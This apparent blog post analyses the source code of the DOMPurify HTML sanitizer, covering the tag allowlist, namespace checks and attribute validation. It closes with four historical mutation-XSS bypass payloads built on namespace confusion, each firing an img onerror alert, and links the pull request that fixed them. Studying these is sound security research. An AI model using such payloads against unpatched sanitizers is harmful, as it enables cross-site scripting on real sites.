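0x00 Introduction to DOMPurify
DOMPurify is a fast, open-source, DOM-based XSS sanitizer. It takes HTML as input, parses it into a DOM, recursively walks the element nodes to sanitize them, and outputs safe HTML.
GitHub: https://github.com/cure53/DOMPurify
Latest version at the time of writing: 2.2.8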
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");
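After this code runs, clean holds <img src="x">.
DOMPurify.sanitize is the most common entry point. It also accepts a second argument, a configuration object; see the official documentation for the available options.
DOMPurify is written with ES6 syntax. I wanted to debug it under Node in WebStorm, which needs a little setup (see the article "Node.js 中使用 ES6 中的 import / export 的方法大全", a roundup of ways to use ES6 import/export in Node.js):
https://github.com/cure53/DOMPurify/tree/main/src
Download everything under that directory and rename the files to the .mjs extension.
import createDOMPurify from "./DOMPurify-main/src/purify.mjs";
import JSDOM from 'jsdom';
const window = new JSDOM.JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const html = "<img/src=x onerror=alert(1)>";
console.log(DOMPurify.sanitize(html));
Stepping into the sanitize function, the main code is: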
const nodeIterator = _createIterator(IN_PLACE ? dirty : body);

/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }

  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }

  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
    _sanitizeShadowDOM(currentNode.content);
  }

  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);

  oldNode = currentNode;
}

oldNode = null;
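The traversal in the loop above can be pictured with a toy tree. This is only a rough sketch: the node shape ({ name, children }) and the iterateNodes helper are made up for illustration and are not part of DOMPurify or the DOM API. It assumes the iterator reports the root first and then its descendants in document order.

```javascript
// Pre-order, depth-first walk: the root first, then each subtree in order.
// (Hypothetical helper; the real code uses a DOM NodeIterator.)
function* iterateNodes(node) {
  yield node;
  for (const child of node.children) {
    yield* iterateNodes(child);
  }
}

// Rough stand-in for the tree produced by parsing "<img src=x><svg src=x>".
const body = {
  name: 'body',
  children: [
    { name: 'img', children: [] },
    { name: 'svg', children: [] },
  ],
};

const visited = [];
for (const node of iterateNodes(body)) {
  visited.push(node.name); // each node is handed to the sanitizers one by one
}
console.log(visited); // [ 'body', 'img', 'svg' ]
```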
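dirty is the object to be sanitized, that is, our input.
The _createIterator function and the while ((currentNode = nodeIterator.nextNode())) loop walk the parsed input one node at a time, as individual HTMLElement objects. For example, <img src=x><svg src=x> yields two elements, img and svg.
Two functions do the real work inside the loop: _sanitizeElements and _sanitizeAttributes. As the names suggest, _sanitizeElements sanitizes tags and _sanitizeAttributes sanitizes a tag's attributes.
Inside _sanitizeElements:
/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}

/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);
A tag whose name contains non-ASCII characters (U+0080 to U+FFFF) is removed outright. The tag name is then normalized to lowercase.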
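A minimal sketch of this first step, reusing the same regular expression. The normalizeTagName helper is hypothetical and only illustrates the decision; returning null here stands in for "remove the node".

```javascript
// Same pattern as in the snippet above: any code unit from U+0080 to U+FFFF.
const NON_ASCII = /[\u0080-\uFFFF]/;

// Hypothetical helper: null means the node would be removed, otherwise the
// lowercased name that later allowlist lookups would use.
function normalizeTagName(nodeName) {
  if (NON_ASCII.test(nodeName)) {
    return null;
  }
  return nodeName.toLowerCase();
}

console.log(normalizeTagName('IMG'));       // 'img'
console.log(normalizeTagName('im\u0131g')); // null (contains U+0131)
```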
if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
  /* Keep content except for bad-listed elements */
  if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
    const parentNode = getParentNode(currentNode) || currentNode.parentNode;
    const childNodes = getChildNodes(currentNode) || currentNode.childNodes;

    if (childNodes && parentNode) {
      const childCount = childNodes.length;

      for (let i = childCount - 1; i >= 0; --i) {
        parentNode.insertBefore(
          cloneNode(childNodes[i], true),
          getNextSibling(currentNode)
        );
      }
    }
  }

  _forceRemove(currentNode);
  return true;
}
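Tags that are not on the allowlist are filtered out. When KEEP_CONTENT is enabled, the children of a removed tag are first cloned into its parent, unless the tag is listed in FORBID_CONTENTS. The allowlist is defined in tags.js:
export const html = freeze([
  'a',
  'abbr',
  'acronym',
  'address',
  'area',
  'article',
  'aside',
  'audio',
  'b',
  ......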
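The allowlist filtering with KEEP_CONTENT can be sketched on a toy tree. Everything below is an assumption made for illustration: the three-entry allowlist, the el/text/render helpers, and the recursive bottom-up order, which differs from the real iterator-driven loop that re-visits hoisted children.

```javascript
// Tiny stand-in allowlist; the real one in tags.js is far longer.
const ALLOWED_TAGS = { a: true, b: true, p: true, '#text': true };
// Tags whose content is dropped together with the tag (illustrative subset).
const FORBID_CONTENTS = { script: true, style: true };
const KEEP_CONTENT = true;

// Hypothetical toy nodes, not DOM objects.
const text = (value) => ({ name: '#text', text: value, children: [] });
const el = (name, ...children) => ({ name, children });

function sanitizeChildren(parent) {
  const kept = [];
  for (const child of parent.children) {
    sanitizeChildren(child); // clean the subtree first
    if (ALLOWED_TAGS[child.name]) {
      kept.push(child);
    } else if (KEEP_CONTENT && !FORBID_CONTENTS[child.name]) {
      kept.push(...child.children); // hoist the content, drop the tag itself
    }
    // otherwise both the tag and its content are dropped
  }
  parent.children = kept;
  return parent;
}

function render(node) {
  if (node.name === '#text') return node.text;
  const inner = node.children.map(render).join('');
  return node.name === '#root' ? inner : `<${node.name}>${inner}</${node.name}>`;
}

const root = el('#root',
  el('p', el('custom-tag', text('hi'))),
  el('script', text('alert(1)')));
console.log(render(sanitizeChildren(root))); // <p>hi</p>
```

The unknown custom-tag disappears but its text survives, while script is dropped together with its content.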
/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
  _forceRemove(currentNode);
  return true;
}

if (
  (tagName === 'noscript' || tagName === 'noembed') &&
  regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
  _forceRemove(currentNode);
  return true;
}
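This validates the element's namespace, a check that has been bypassed in the past. The noscript/noembed check after it looks somewhat redundant under the default configuration: neither tag is on the allowlist, so both are already removed by the allowlist check above.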
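To see what the noscript/noembed condition catches, here is a small sketch using the same regular expression. The isSuspiciousNoTag helper is hypothetical. The check presumably only comes into play when a caller has explicitly allowed these tags through configuration, which is an assumption on my part rather than something traced in the code.

```javascript
// Same pattern as in the snippet above.
const CLOSING_NO_TAG = /<\/no(script|embed)/i;

// Hypothetical helper mirroring the condition: true means "remove this node".
function isSuspiciousNoTag(tagName, innerHTML) {
  return (tagName === 'noscript' || tagName === 'noembed') &&
    CLOSING_NO_TAG.test(innerHTML);
}

// A closing tag hidden inside an attribute value is flagged.
console.log(isSuspiciousNoTag('noscript', '<p title="</noscript><img src onerror=alert(1)>">')); // true
// Ordinary fallback content is not.
console.log(isSuspiciousNoTag('noscript', '<p>fallback</p>')); // false
```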
In _sanitizeAttributes, every attribute is first removed from currentNode, whatever it is (unless a hook has set forceKeepAttr):
if (hookEvent.forceKeepAttr) {
  continue;
}

/* Remove attribute */
_removeAttribute(name, currentNode);

/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
  continue;
}
Then the tag name, attribute name, and attribute value are passed to _isValidAttribute for a verdict.
const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
  continue;
}
If the attribute is valid, setAttribute is called to put it back.
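The remove-then-restore flow can be sketched with a Map standing in for an element's attribute list. Both functions here are simplified, hypothetical stand-ins; in particular the validity check below is far cruder than the real _isValidAttribute.

```javascript
// Hypothetical, much simplified stand-in for _isValidAttribute.
function isValidAttribute(tag, name, value) {
  const allowed = { src: true, alt: true, href: true };
  return Boolean(allowed[name]) && !/^javascript:/i.test(value);
}

// attrs is a Map standing in for the element's attributes.
function sanitizeAttributes(tag, attrs) {
  for (const [name, value] of [...attrs]) { // iterate a copy: the Map is mutated
    const lcName = name.toLowerCase();
    attrs.delete(name);                     // 1. always remove first
    if (isValidAttribute(tag, lcName, value)) {
      attrs.set(lcName, value);             // 2. restore only what passes
    }
  }
  return attrs;
}

const attrs = new Map([['src', 'x'], ['onerror', 'alert(1)']]);
console.log([...sanitizeAttributes('img', attrs)]); // [ [ 'src', 'x' ] ]
```

Removing first means an attribute that fails validation, or that the code never gets around to restoring, simply stays gone.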
The key function is _isValidAttribute. You can step through it in a debugger and try to find a bypass... nice try...
if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
  // This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
  // This attribute is safe
  /* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
  return false;

  /* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
  // This attribute is safe
  /* Check no script, data or unknown possibly unsafe URI
     unless we know URI values are safe for that attribute */
} else if (
  regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Keep image data URIs alive if src/xlink:href is allowed */
  /* Further prevent gadget XSS for dynamically built script tags */
} else if (
  (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
  lcTag !== 'script' &&
  stringIndexOf(value, 'data:') === 0 &&
  DATA_URI_TAGS[lcTag]
) {
  // This attribute is safe
  /* Allow unknown protocols: This provides support for links that
     are handled by protocol handlers which may be unknown ahead of
     time, e.g. fb:, spotify: */
} else if (
  ALLOW_UNKNOWN_PROTOCOLS &&
  !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Check for binary attributes */
  // eslint-disable-next-line no-negated-condition
} else if (!value) {
  // Binary attributes are safe at this point
  /* Anything else, presume unsafe, do not add it back */
} else {
  return false;
}
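The IS_ALLOWED_URI branch is where most URL-valued attributes are decided, so it is worth trying in isolation. The two patterns below are written from memory of DOMPurify's regexp.js and should be treated as assumptions; check the actual source before relying on the exact character classes. The isAllowedUri helper is hypothetical.

```javascript
// Assumed to match DOMPurify's patterns; verify against src/regexp.js.
const IS_ALLOWED_URI = /^(?:(?:(?:f|ht)tps?|mailto|tel|callto|cid|xmpp):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i;
const ATTR_WHITESPACE = /[\u0000-\u0020\u00A0\u1680\u180E\u2000-\u2029\u205F\u3000]/g;

// Strip whitespace first, then test, as the branch above does.
function isAllowedUri(value) {
  return IS_ALLOWED_URI.test(value.replace(ATTR_WHITESPACE, ''));
}

console.log(isAllowedUri('https://example.com/a.png')); // true
console.log(isAllowedUri('/relative/path'));            // true
console.log(isAllowedUri('javascript:alert(1)'));       // false
console.log(isAllowedUri('java\tscript:alert(1)'));     // false
// Without the whitespace stripping, the tab would let the payload through:
console.log(IS_ALLOWED_URI.test('java\tscript:alert(1)')); // true
```

A data: URI also fails this test, which is why it falls through to the later branch that allows it only for specific tags.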
Past bypasses can be found in the project's pull requests and in the release changelogs, for example:
Namespace confusion bypass: https://github.com/cure53/DOMPurify/pull/495
Payloads:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">
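Original-content notice: this article is published on the Tencent Cloud Developer Community with the author's authorization and may not be reproduced without permission.
In case of infringement, please contact cloudcommunity@tencent.com to have it removed.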